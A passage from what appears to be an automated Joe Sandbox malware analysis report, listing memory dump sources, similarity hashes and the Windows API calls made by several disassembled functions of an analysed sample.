                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                                • Instruction ID: ce4c3b2ba86c6f6c119685c1f909f4ca062621dcfedb5de8325838dac45ff1a4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2314071244305AFD204DF61CCC5FABB3E9EBC8748F048A0CF58957290D674EA468B65
                                                                                                                                                                                                                                                                                                Function 0040F130 Relevance: 6.1, APIs: 4, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1863454828-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                                Function 00454EF0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3839614884-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                                • Instruction ID: 61ee5ff977679a68600c6b3ba5455a9d5faea7aa6e4a004e82da9cd24f1d17ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B21D2B6608351AFC310DE59D880E6BBBE8EBD9305F00495DF8849B302D275EC458BB6
                                                                                                                                                                                                                                                                                                Function 00424850 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 80sleepCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                                • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                                • API String ID: 451317006-1228882529
                                                                                                                                                                                                                                                                                                • Opcode ID: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                                • Instruction ID: 2aae77fe05b5572fc9a22550ba8b2e73634bf3b6c40b7b563c05c91186231963
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6021D439B102224BD724DE68DD84BE73351DFC4325F5A4279ED098F382DB66EC468299
                                                                                                                                                                                                                                                                                                Function 00463530 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                                • Instruction ID: 72788d8031d8da8ebdf27af98cafe7d3eb32084a5d4fa9d01f0a72895e77951c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8711C4716003412BE3109B169C46BAB769CEBD1710F44483EF548E6151EAA8EA098BEF
                                                                                                                                                                                                                                                                                                Function 0041AA90 Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3220701275-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                                • Instruction ID: 1850dbf4910a2f6436d9a8060cce1c0b3c7b383cd418d825aeeea627d68539a0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79213AB5604601AFC714DF68D985F6AB7E8FB8C710F008A2DF459C3690DB74E8448B95
                                                                                                                                                                                                                                                                                                Function 00503B1B Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00503B37
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00503B50
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c3eb6bf0a7234faedb7c0a201c394f7478a2313920b75adf210bd18b39fa6472
                                                                                                                                                                                                                                                                                                • Instruction ID: 7e37d591e5fb7ec4360ecac0c59ba3527d828e2593e8c178730152400d6c93e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3eb6bf0a7234faedb7c0a201c394f7478a2313920b75adf210bd18b39fa6472
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD01DF322096625EEB643BB8FC8EA6F3F9CFB82778720033AF524550E1EF514E555149
                                                                                                                                                                                                                                                                                                Function 00454FD0 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00454FE5
                                                                                                                                                                                                                                                                                                • __alldvrm.LIBCMT ref: 00454FF8
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045500B
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00455044
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
